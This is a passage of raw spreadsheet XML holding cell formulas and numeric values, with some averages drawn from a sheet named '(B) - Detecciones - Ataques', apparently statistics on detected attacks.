        <f t="shared" si="195"/>
        <v>5</v>
      </c>
      <c r="CJ126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="CK126" s="518">
        <f t="shared" si="195"/>
        <v>25</v>
      </c>
      <c r="CL126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CM126" s="518">
        <f t="shared" si="195"/>
        <v>147</v>
      </c>
      <c r="CN126" s="518">
        <f t="shared" si="195"/>
        <v>4</v>
      </c>
      <c r="CO126" s="518">
        <f t="shared" si="195"/>
        <v>4.666666667</v>
      </c>
      <c r="CP126" s="518">
        <f t="shared" si="195"/>
        <v>56</v>
      </c>
      <c r="CQ126" s="518">
        <f t="shared" si="195"/>
        <v>19</v>
      </c>
      <c r="CR126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CS126" s="518">
        <f t="shared" si="195"/>
        <v>0.05796196029</v>
      </c>
      <c r="CT126" s="518">
        <f t="shared" si="195"/>
        <v>0.0119760479</v>
      </c>
      <c r="CU126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CV126" s="518">
        <f t="shared" si="195"/>
        <v>8</v>
      </c>
      <c r="CW126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="CX126" s="518">
        <f t="shared" si="195"/>
        <v>14.5</v>
      </c>
      <c r="CY126" s="518">
        <f t="shared" si="195"/>
        <v>3</v>
      </c>
      <c r="CZ126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="DA126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="DB126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="DC126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="DD126" s="518">
        <f t="shared" si="195"/>
        <v>14</v>
      </c>
      <c r="DE126" s="518">
        <f t="shared" si="195"/>
        <v>3.8</v>
      </c>
      <c r="DF126" s="518">
        <f t="shared" si="195"/>
        <v>11</v>
      </c>
      <c r="DG126" s="518" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="DH126" s="518">
        <f t="shared" si="195"/>
        <v>3.051111111</v>
      </c>
      <c r="DI126" s="518">
        <f t="shared" si="195"/>
        <v>0.5039355831</v>
      </c>
      <c r="DJ126" s="519">
        <f t="shared" si="195"/>
        <v>2</v>
      </c>
      <c r="DK126" s="271"/>
      <c r="EG126" s="525"/>
      <c r="EH126" s="526"/>
      <c r="EI126" s="526"/>
      <c r="EJ126" s="526"/>
      <c r="EK126" s="526"/>
      <c r="EL126" s="526"/>
      <c r="EM126" s="526"/>
      <c r="EN126" s="526"/>
      <c r="EO126" s="526"/>
      <c r="EP126" s="526"/>
      <c r="EQ126" s="526"/>
      <c r="ER126" s="526"/>
      <c r="ES126" s="526"/>
      <c r="ET126" s="526"/>
      <c r="EU126" s="526"/>
      <c r="EV126" s="526"/>
      <c r="EW126" s="526"/>
      <c r="EX126" s="526"/>
      <c r="EY126" s="526"/>
      <c r="EZ126" s="526"/>
      <c r="FA126" s="527"/>
    </row>
    <row r="127">
      <c r="J127" s="277"/>
      <c r="K127" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BT3:BT139)</f>
        <v>0.0499595818</v>
      </c>
      <c r="L127" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DJ3:DJ139)</f>
        <v>0.2240707117</v>
      </c>
      <c r="M127" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EZ3:EZ139)</f>
        <v>0.3783550506</v>
      </c>
      <c r="N127" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GP3:GP139)</f>
        <v>0.4445645393</v>
      </c>
      <c r="O127" s="278"/>
      <c r="Q127" s="271"/>
      <c r="R127" s="505" t="s">
        <v>2549</v>
      </c>
      <c r="S127" s="522">
        <f t="shared" ref="S127:V127" si="196">S79/S$31</f>
        <v>2.158975864</v>
      </c>
      <c r="T127" s="522">
        <f t="shared" si="196"/>
        <v>0.04066307756</v>
      </c>
      <c r="U127" s="522">
        <f t="shared" si="196"/>
        <v>2.071428571</v>
      </c>
      <c r="V127" s="522">
        <f t="shared" si="196"/>
        <v>4.684210526</v>
      </c>
      <c r="W127" s="501">
        <f t="shared" si="104"/>
        <v>30</v>
      </c>
      <c r="X127" s="522">
        <f t="shared" ref="X127:AF127" si="197">X79/X$31</f>
        <v>4495.818182</v>
      </c>
      <c r="Y127" s="522">
        <f t="shared" si="197"/>
        <v>3.571428571</v>
      </c>
      <c r="Z127" s="522">
        <f t="shared" si="197"/>
        <v>56.78862268</v>
      </c>
      <c r="AA127" s="522">
        <f t="shared" si="197"/>
        <v>0.1354466859</v>
      </c>
      <c r="AB127" s="522">
        <f t="shared" si="197"/>
        <v>10.60869565</v>
      </c>
      <c r="AC127" s="522">
        <f t="shared" si="197"/>
        <v>10.6</v>
      </c>
      <c r="AD127" s="522">
        <f t="shared" si="197"/>
        <v>0.05736975423</v>
      </c>
      <c r="AE127" s="522">
        <f t="shared" si="197"/>
        <v>0.75</v>
      </c>
      <c r="AF127" s="523">
        <f t="shared" si="197"/>
        <v>0.6015631785</v>
      </c>
      <c r="AG127" s="271"/>
      <c r="AH127" s="505" t="s">
        <v>2549</v>
      </c>
      <c r="AI127" s="528">
        <f t="shared" ref="AI127:DJ127" si="198">IF(AI$30=0,"-",AI79/AI$31)</f>
        <v>2.158899083</v>
      </c>
      <c r="AJ127" s="528">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="AK127" s="528">
        <f t="shared" si="198"/>
        <v>3.25</v>
      </c>
      <c r="AL127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="AM127" s="528">
        <f t="shared" si="198"/>
        <v>0.04066307756</v>
      </c>
      <c r="AN127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AO127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AP127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AQ127" s="528">
        <f t="shared" si="198"/>
        <v>2.042735043</v>
      </c>
      <c r="AR127" s="528">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="AS127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AT127" s="528">
        <f t="shared" si="198"/>
        <v>2</v>
      </c>
      <c r="AU127" s="528">
        <f t="shared" si="198"/>
        <v>3</v>
      </c>
      <c r="AV127" s="528">
        <f t="shared" si="198"/>
        <v>5</v>
      </c>
      <c r="AW127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AX127" s="528">
        <f t="shared" si="198"/>
        <v>3.5</v>
      </c>
      <c r="AY127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="AZ127" s="528">
        <f t="shared" si="198"/>
        <v>1.5</v>
      </c>
      <c r="BA127" s="528">
        <f t="shared" si="198"/>
        <v>30</v>
      </c>
      <c r="BB127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BC127" s="528">
        <f t="shared" si="198"/>
        <v>16484.66667</v>
      </c>
      <c r="BD127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BE127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BF127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BG127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BH127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BI127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BJ127" s="528">
        <f t="shared" si="198"/>
        <v>2</v>
      </c>
      <c r="BK127" s="528">
        <f t="shared" si="198"/>
        <v>7.666666667</v>
      </c>
      <c r="BL127" s="528">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="BM127" s="528">
        <f t="shared" si="198"/>
        <v>45.52430134</v>
      </c>
      <c r="BN127" s="528">
        <f t="shared" si="198"/>
        <v>63.95810811</v>
      </c>
      <c r="BO127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BP127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BQ127" s="528">
        <f t="shared" si="198"/>
        <v>0.009803921569</v>
      </c>
      <c r="BR127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BS127" s="528">
        <f t="shared" si="198"/>
        <v>7</v>
      </c>
      <c r="BT127" s="528">
        <f t="shared" si="198"/>
        <v>3</v>
      </c>
      <c r="BU127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BV127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BW127" s="528">
        <f t="shared" si="198"/>
        <v>10</v>
      </c>
      <c r="BX127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="BY127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="BZ127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="CA127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CB127" s="528">
        <f t="shared" si="198"/>
        <v>4</v>
      </c>
      <c r="CC127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="CD127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="CE127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CF127" s="528">
        <f t="shared" si="198"/>
        <v>8</v>
      </c>
      <c r="CG127" s="528">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="CH127" s="528">
        <f t="shared" si="198"/>
        <v>6</v>
      </c>
      <c r="CI127" s="528">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="CJ127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="CK127" s="528">
        <f t="shared" si="198"/>
        <v>12</v>
      </c>
      <c r="CL127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CM127" s="528">
        <f t="shared" si="198"/>
        <v>84</v>
      </c>
      <c r="CN127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="CO127" s="528">
        <f t="shared" si="198"/>
        <v>3.333333333</v>
      </c>
      <c r="CP127" s="528">
        <f t="shared" si="198"/>
        <v>39.5</v>
      </c>
      <c r="CQ127" s="528">
        <f t="shared" si="198"/>
        <v>7</v>
      </c>
      <c r="CR127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CS127" s="528">
        <f t="shared" si="198"/>
        <v>0.05772594752</v>
      </c>
      <c r="CT127" s="528">
        <f t="shared" si="198"/>
        <v>0.002994011976</v>
      </c>
      <c r="CU127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CV127" s="528">
        <f t="shared" si="198"/>
        <v>6</v>
      </c>
      <c r="CW127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="CX127" s="528">
        <f t="shared" si="198"/>
        <v>11.5</v>
      </c>
      <c r="CY127" s="528">
        <f t="shared" si="198"/>
        <v>0.1764705882</v>
      </c>
      <c r="CZ127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="DA127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="DB127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="DC127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="DD127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="DE127" s="528">
        <f t="shared" si="198"/>
        <v>3</v>
      </c>
      <c r="DF127" s="528">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="DG127" s="528" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="DH127" s="528">
        <f t="shared" si="198"/>
        <v>3.033333333</v>
      </c>
      <c r="DI127" s="528">
        <f t="shared" si="198"/>
        <v>0.4987786121</v>
      </c>
      <c r="DJ127" s="529">
        <f t="shared" si="198"/>
        <v>1.727272727</v>
      </c>
      <c r="DK127" s="271"/>
    </row>
    <row r="128">
      <c r="J128" s="277"/>
      <c r="K128" s="434"/>
      <c r="L128" s="353"/>
      <c r="M128" s="353"/>
      <c r="N128" s="354"/>
      <c r="O128" s="278"/>
      <c r="Q128" s="271"/>
      <c r="R128" s="510"/>
      <c r="S128" s="510"/>
      <c r="T128" s="510"/>
      <c r="U128" s="510"/>
      <c r="V128" s="510"/>
      <c r="W128" s="510"/>
      <c r="X128" s="271"/>
      <c r="Y128" s="271"/>
      <c r="Z128" s="271"/>
      <c r="AA128" s="271"/>
      <c r="AB128" s="271"/>
      <c r="AC128" s="271"/>
      <c r="AD128" s="271"/>
      <c r="AE128" s="271"/>
      <c r="AF128" s="271"/>
      <c r="AG128" s="271"/>
      <c r="AH128" s="271"/>
      <c r="AI128" s="512"/>
      <c r="AJ128" s="512"/>
      <c r="AK128" s="512"/>
      <c r="AL128" s="512"/>
      <c r="AM128" s="512"/>
      <c r="AN128" s="512"/>
      <c r="AO128" s="512"/>
      <c r="AP128" s="512"/>
      <c r="AQ128" s="512"/>
      <c r="AR128" s="512"/>
      <c r="AS128" s="512"/>
      <c r="AT128" s="512"/>
      <c r="AU128" s="512"/>
      <c r="AV128" s="512"/>
      <c r="AW128" s="512"/>
      <c r="AX128" s="512"/>
      <c r="AY128" s="512"/>
      <c r="AZ128" s="512"/>
      <c r="BA128" s="512"/>
      <c r="BB128" s="512"/>
      <c r="BC128" s="512"/>
      <c r="BD128" s="512"/>
      <c r="BE128" s="512"/>
      <c r="BF128" s="512"/>
      <c r="BG128" s="512"/>
      <c r="BH128" s="512"/>
      <c r="BI128" s="512"/>
      <c r="BJ128" s="512"/>
      <c r="BK128" s="512"/>
      <c r="BL128" s="512"/>
      <c r="BM128" s="512"/>
      <c r="BN128" s="512"/>
      <c r="BO128" s="512"/>
      <c r="BP128" s="512"/>
      <c r="BQ128" s="512"/>
      <c r="BR128" s="512"/>
      <c r="BS128" s="512"/>
      <c r="BT128" s="512"/>
      <c r="BU128" s="512"/>
      <c r="BV128" s="512"/>
      <c r="BW128" s="512"/>
      <c r="BX128" s="512"/>
      <c r="BY128" s="512"/>
      <c r="BZ128" s="512"/>
      <c r="CA128" s="512"/>
      <c r="CB128" s="512"/>
      <c r="CC128" s="512"/>
      <c r="CD128" s="512"/>
      <c r="CE128" s="512"/>
      <c r="CF128" s="512"/>
      <c r="CG128" s="512"/>
      <c r="CH128" s="512"/>
      <c r="CI128" s="512"/>
      <c r="CJ128" s="512"/>
      <c r="CK128" s="512"/>
      <c r="CL128" s="512"/>
      <c r="CM128" s="512"/>
      <c r="CN128" s="512"/>
      <c r="CO128" s="512"/>
      <c r="CP128" s="512"/>
      <c r="CQ128" s="512"/>
      <c r="CR128" s="512"/>
      <c r="CS128" s="512"/>
      <c r="CT128" s="512"/>
      <c r="CU128" s="512"/>
      <c r="CV128" s="512"/>
      <c r="CW128" s="512"/>
      <c r="CX128" s="512"/>
      <c r="CY128" s="512"/>
      <c r="CZ128" s="512"/>
      <c r="DA128" s="512"/>
      <c r="DB128" s="512"/>
      <c r="DC128" s="512"/>
      <c r="DD128" s="512"/>
      <c r="DE128" s="512"/>
      <c r="DF128" s="512"/>
      <c r="DG128" s="512"/>
      <c r="DH128" s="512"/>
      <c r="DI128" s="512"/>
      <c r="DJ128" s="512"/>
      <c r="DK128" s="271"/>
    </row>
    <row r="129">
      <c r="J129" s="277"/>
      <c r="K129" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="L129" s="403" t="s">
        <v>2589</v>
      </c>
      <c r="M129" s="403" t="s">
        <v>2590</v>
      </c>
      <c r="N129" s="404" t="s">
        <v>2591</v>
      </c>
      <c r="O129" s="278"/>
      <c r="Q129" s="271"/>
      <c r="R129" s="510"/>
      <c r="S129" s="510"/>
      <c r="T129" s="510"/>
      <c r="U129" s="510"/>
      <c r="V129" s="510"/>
      <c r="W129" s="510"/>
      <c r="X129" s="271"/>
      <c r="Y129" s="271"/>
      <c r="Z129" s="271"/>
      <c r="AA129" s="271"/>
      <c r="AB129" s="271"/>
      <c r="AC129" s="271"/>
      <c r="AD129" s="271"/>
      <c r="AE129" s="271"/>
      <c r="AF129" s="271"/>
      <c r="AG129" s="271"/>
      <c r="AH129" s="271"/>
      <c r="AI129" s="512"/>
      <c r="AJ129" s="512"/>
      <c r="AK129" s="512"/>
      <c r="AL129" s="512"/>
      <c r="AM129" s="512"/>
      <c r="AN129" s="512"/>
      <c r="AO129" s="512"/>
      <c r="AP129" s="512"/>
      <c r="AQ129" s="512"/>
      <c r="AR129" s="512"/>
      <c r="AS129" s="512"/>
      <c r="AT129" s="512"/>
      <c r="AU129" s="512"/>
      <c r="AV129" s="512"/>
      <c r="AW129" s="512"/>
      <c r="AX129" s="512"/>
      <c r="AY129" s="512"/>
      <c r="AZ129" s="512"/>
      <c r="BA129" s="512"/>
      <c r="BB129" s="512"/>
      <c r="BC129" s="512"/>
      <c r="BD129" s="512"/>
      <c r="BE129" s="512"/>
      <c r="BF129" s="512"/>
      <c r="BG129" s="512"/>
      <c r="BH129" s="512"/>
      <c r="BI129" s="512"/>
      <c r="BJ129" s="512"/>
      <c r="BK129" s="512"/>
      <c r="BL129" s="512"/>
      <c r="BM129" s="512"/>
      <c r="BN129" s="512"/>
      <c r="BO129" s="512"/>
      <c r="BP129" s="512"/>
      <c r="BQ129" s="512"/>
      <c r="BR129" s="512"/>
      <c r="BS129" s="512"/>
      <c r="BT129" s="512"/>
      <c r="BU129" s="512"/>
      <c r="BV129" s="512"/>
      <c r="BW129" s="512"/>
      <c r="BX129" s="512"/>
      <c r="BY129" s="512"/>
      <c r="BZ129" s="512"/>
      <c r="CA129" s="512"/>
      <c r="CB129" s="512"/>
      <c r="CC129" s="512"/>
      <c r="CD129" s="512"/>
      <c r="CE129" s="512"/>
      <c r="CF129" s="512"/>
      <c r="CG129" s="512"/>
      <c r="CH129" s="512"/>
      <c r="CI129" s="512"/>
      <c r="CJ129" s="512"/>
      <c r="CK129" s="512"/>
      <c r="CL129" s="512"/>
      <c r="CM129" s="512"/>
      <c r="CN129" s="512"/>
      <c r="CO129" s="512"/>
      <c r="CP129" s="512"/>
      <c r="CQ129" s="512"/>
      <c r="CR129" s="512"/>
      <c r="CS129" s="512"/>
      <c r="CT129" s="512"/>
      <c r="CU129" s="512"/>
      <c r="CV129" s="512"/>
      <c r="CW129" s="512"/>
      <c r="CX129" s="512"/>
      <c r="CY129" s="512"/>
      <c r="CZ129" s="512"/>
      <c r="DA129" s="512"/>
      <c r="DB129" s="512"/>
      <c r="DC129" s="512"/>
      <c r="DD129" s="512"/>
      <c r="DE129" s="512"/>
      <c r="DF129" s="512"/>
      <c r="DG129" s="512"/>
      <c r="DH129" s="512"/>
      <c r="DI129" s="512"/>
      <c r="DJ129" s="512"/>
      <c r="DK129" s="271"/>
    </row>
    <row r="130">
      <c r="J130" s="277"/>
      <c r="K130" s="521">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BS3:BS139)</f>
        <v>82.2387988</v>
      </c>
      <c r="L130" s="522">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DI3:DI139)</f>
        <v>1922.51621</v>
      </c>
      <c r="M130" s="522">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EY3:EY139)</f>
        <v>58487.97851</v>
      </c>
      <c r="N130" s="523">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GO3:GO139)</f>
        <v>62142.71276</v>
      </c>
      <c r="O130" s="278"/>
      <c r="Q130" s="271"/>
      <c r="R130" s="291" t="s">
        <v>2602</v>
      </c>
      <c r="S130" s="292"/>
      <c r="T130" s="292"/>
      <c r="U130" s="292"/>
      <c r="V130" s="292"/>
      <c r="W130" s="292"/>
      <c r="X130" s="292"/>
      <c r="Y130" s="292"/>
      <c r="Z130" s="292"/>
      <c r="AA130" s="292"/>
      <c r="AB130" s="292"/>
      <c r="AC130" s="292"/>
      <c r="AD130" s="292"/>
      <c r="AE130" s="292"/>
      <c r="AF130" s="293"/>
      <c r="AG130" s="271"/>
      <c r="AH130" s="294" t="s">
        <v>2603</v>
      </c>
      <c r="AI130" s="292"/>
      <c r="AJ130" s="292"/>
      <c r="AK130" s="292"/>
      <c r="AL130" s="292"/>
      <c r="AM130" s="292"/>
      <c r="AN130" s="292"/>
      <c r="AO130" s="292"/>
      <c r="AP130" s="292"/>
      <c r="AQ130" s="292"/>
      <c r="AR130" s="292"/>
      <c r="AS130" s="292"/>
      <c r="AT130" s="292"/>
      <c r="AU130" s="292"/>
      <c r="AV130" s="292"/>
      <c r="AW130" s="292"/>
      <c r="AX130" s="292"/>
      <c r="AY130" s="292"/>
      <c r="AZ130" s="292"/>
      <c r="BA130" s="292"/>
      <c r="BB130" s="292"/>
      <c r="BC130" s="292"/>
      <c r="BD130" s="292"/>
      <c r="BE130" s="292"/>
      <c r="BF130" s="292"/>
      <c r="BG130" s="292"/>
      <c r="BH130" s="292"/>
      <c r="BI130" s="292"/>
      <c r="BJ130" s="292"/>
      <c r="BK130" s="292"/>
      <c r="BL130" s="292"/>
      <c r="BM130" s="292"/>
      <c r="BN130" s="292"/>
      <c r="BO130" s="292"/>
      <c r="BP130" s="292"/>
      <c r="BQ130" s="292"/>
      <c r="BR130" s="292"/>
      <c r="BS130" s="292"/>
      <c r="BT130" s="292"/>
      <c r="BU130" s="292"/>
      <c r="BV130" s="292"/>
      <c r="BW130" s="292"/>
      <c r="BX130" s="292"/>
      <c r="BY130" s="292"/>
      <c r="BZ130" s="292"/>
      <c r="CA130" s="292"/>
      <c r="CB130" s="292"/>
      <c r="CC130" s="292"/>
      <c r="CD130" s="292"/>
      <c r="CE130" s="292"/>
      <c r="CF130" s="292"/>
      <c r="CG130" s="292"/>
      <c r="CH130" s="292"/>
      <c r="CI130" s="292"/>
      <c r="CJ130" s="292"/>
      <c r="CK130" s="292"/>
      <c r="CL130" s="292"/>
      <c r="CM130" s="292"/>
      <c r="CN130" s="292"/>
      <c r="CO130" s="292"/>
      <c r="CP130" s="292"/>
      <c r="CQ130" s="292"/>
      <c r="CR130" s="292"/>
      <c r="CS130" s="292"/>
      <c r="CT130" s="292"/>
      <c r="CU130" s="292"/>
      <c r="CV130" s="292"/>
      <c r="CW130" s="292"/>
      <c r="CX130" s="292"/>
      <c r="CY130" s="292"/>
      <c r="CZ130" s="292"/>
      <c r="DA130" s="292"/>
      <c r="DB130" s="292"/>
      <c r="DC130" s="292"/>
      <c r="DD130" s="292"/>
      <c r="DE130" s="292"/>
      <c r="DF130" s="292"/>
      <c r="DG130" s="292"/>
      <c r="DH130" s="292"/>
      <c r="DI130" s="292"/>
      <c r="DJ130" s="293"/>
      <c r="DK130" s="271"/>
    </row>
    <row r="131">
      <c r="J131" s="277"/>
      <c r="K131" s="512"/>
      <c r="L131" s="512"/>
      <c r="M131" s="512"/>
      <c r="N131" s="512"/>
      <c r="O131" s="278"/>
      <c r="Q131" s="271"/>
      <c r="R131" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="S131" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="T131" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="U131" s="316" t="s">
        <v>951</v>
      </c>
      <c r="V131" s="316" t="s">
        <v>633</v>
      </c>
      <c r="W131" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="X131" s="316" t="s">
        <v>244</v>
      </c>
      <c r="Y131" s="316" t="s">
        <v>427</v>
      </c>
      <c r="Z131" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="AA131" s="316" t="s">
        <v>209</v>
      </c>
      <c r="AB131" s="316" t="s">
        <v>664</v>
      </c>
      <c r="AC131" s="316" t="s">
        <v>357</v>
      </c>
      <c r="AD131" s="316" t="s">
        <v>310</v>
      </c>
      <c r="AE131" s="316" t="s">
        <v>292</v>
      </c>
      <c r="AF131" s="317" t="s">
        <v>558</v>
      </c>
      <c r="AG131" s="271"/>
      <c r="AH131" s="291" t="s">
        <v>2447</v>
      </c>
      <c r="AI131" s="498" t="s">
        <v>2108</v>
      </c>
      <c r="AJ131" s="513" t="s">
        <v>2177</v>
      </c>
      <c r="AK131" s="498" t="s">
        <v>2193</v>
      </c>
      <c r="AL131" s="498" t="s">
        <v>2095</v>
      </c>
      <c r="AM131" s="498" t="s">
        <v>2074</v>
      </c>
      <c r="AN131" s="498" t="s">
        <v>2061</v>
      </c>
      <c r="AO131" s="498" t="s">
        <v>2015</v>
      </c>
      <c r="AP131" s="498" t="s">
        <v>953</v>
      </c>
      <c r="AQ131" s="498" t="s">
        <v>1040</v>
      </c>
      <c r="AR131" s="498" t="s">
        <v>1012</v>
      </c>
      <c r="AS131" s="498" t="s">
        <v>1164</v>
      </c>
      <c r="AT131" s="498" t="s">
        <v>1848</v>
      </c>
      <c r="AU131" s="498" t="s">
        <v>2300</v>
      </c>
      <c r="AV131" s="498" t="s">
        <v>1138</v>
      </c>
      <c r="AW131" s="498" t="s">
        <v>974</v>
      </c>
      <c r="AX131" s="498" t="s">
        <v>1108</v>
      </c>
      <c r="AY131" s="498" t="s">
        <v>1702</v>
      </c>
      <c r="AZ131" s="498" t="s">
        <v>1626</v>
      </c>
      <c r="BA131" s="514" t="s">
        <v>636</v>
      </c>
      <c r="BB131" s="498" t="s">
        <v>1726</v>
      </c>
      <c r="BC131" s="498" t="s">
        <v>822</v>
      </c>
      <c r="BD131" s="498" t="s">
        <v>445</v>
      </c>
      <c r="BE131" s="498" t="s">
        <v>1747</v>
      </c>
      <c r="BF131" s="498" t="s">
        <v>989</v>
      </c>
      <c r="BG131" s="498" t="s">
        <v>246</v>
      </c>
      <c r="BH131" s="498" t="s">
        <v>2242</v>
      </c>
      <c r="BI131" s="498" t="s">
        <v>1282</v>
      </c>
      <c r="BJ131" s="498" t="s">
        <v>429</v>
      </c>
      <c r="BK131" s="498" t="s">
        <v>912</v>
      </c>
      <c r="BL131" s="498" t="s">
        <v>1837</v>
      </c>
      <c r="BM131" s="498" t="s">
        <v>1510</v>
      </c>
      <c r="BN131" s="498" t="s">
        <v>1411</v>
      </c>
      <c r="BO131" s="498" t="s">
        <v>1397</v>
      </c>
      <c r="BP131" s="498" t="s">
        <v>1374</v>
      </c>
      <c r="BQ131" s="498" t="s">
        <v>677</v>
      </c>
      <c r="BR131" s="498" t="s">
        <v>790</v>
      </c>
      <c r="BS131" s="498" t="s">
        <v>262</v>
      </c>
      <c r="BT131" s="498" t="s">
        <v>771</v>
      </c>
      <c r="BU131" s="498" t="s">
        <v>724</v>
      </c>
      <c r="BV131" s="498" t="s">
        <v>211</v>
      </c>
      <c r="BW131" s="498" t="s">
        <v>805</v>
      </c>
      <c r="BX131" s="498" t="s">
        <v>932</v>
      </c>
      <c r="BY131" s="498" t="s">
        <v>1306</v>
      </c>
      <c r="BZ131" s="498" t="s">
        <v>1903</v>
      </c>
      <c r="CA131" s="498" t="s">
        <v>2335</v>
      </c>
      <c r="CB131" s="498" t="s">
        <v>1983</v>
      </c>
      <c r="CC131" s="498" t="s">
        <v>1999</v>
      </c>
      <c r="CD131" s="498" t="s">
        <v>1971</v>
      </c>
      <c r="CE131" s="498" t="s">
        <v>1201</v>
      </c>
      <c r="CF131" s="498" t="s">
        <v>750</v>
      </c>
      <c r="CG131" s="498" t="s">
        <v>666</v>
      </c>
      <c r="CH131" s="498" t="s">
        <v>892</v>
      </c>
      <c r="CI131" s="498" t="s">
        <v>1214</v>
      </c>
      <c r="CJ131" s="498" t="s">
        <v>1293</v>
      </c>
      <c r="CK131" s="498" t="s">
        <v>1331</v>
      </c>
      <c r="CL131" s="498" t="s">
        <v>2215</v>
      </c>
      <c r="CM131" s="498" t="s">
        <v>2261</v>
      </c>
      <c r="CN131" s="498" t="s">
        <v>359</v>
      </c>
      <c r="CO131" s="498" t="s">
        <v>1230</v>
      </c>
      <c r="CP131" s="498" t="s">
        <v>1812</v>
      </c>
      <c r="CQ131" s="498" t="s">
        <v>1958</v>
      </c>
      <c r="CR131" s="498" t="s">
        <v>1667</v>
      </c>
      <c r="CS131" s="498" t="s">
        <v>505</v>
      </c>
      <c r="CT131" s="498" t="s">
        <v>312</v>
      </c>
      <c r="CU131" s="498" t="s">
        <v>2289</v>
      </c>
      <c r="CV131" s="498" t="s">
        <v>411</v>
      </c>
      <c r="CW131" s="498" t="s">
        <v>1361</v>
      </c>
      <c r="CX131" s="498" t="s">
        <v>701</v>
      </c>
      <c r="CY131" s="498" t="s">
        <v>586</v>
      </c>
      <c r="CZ131" s="498" t="s">
        <v>294</v>
      </c>
      <c r="DA131" s="498" t="s">
        <v>339</v>
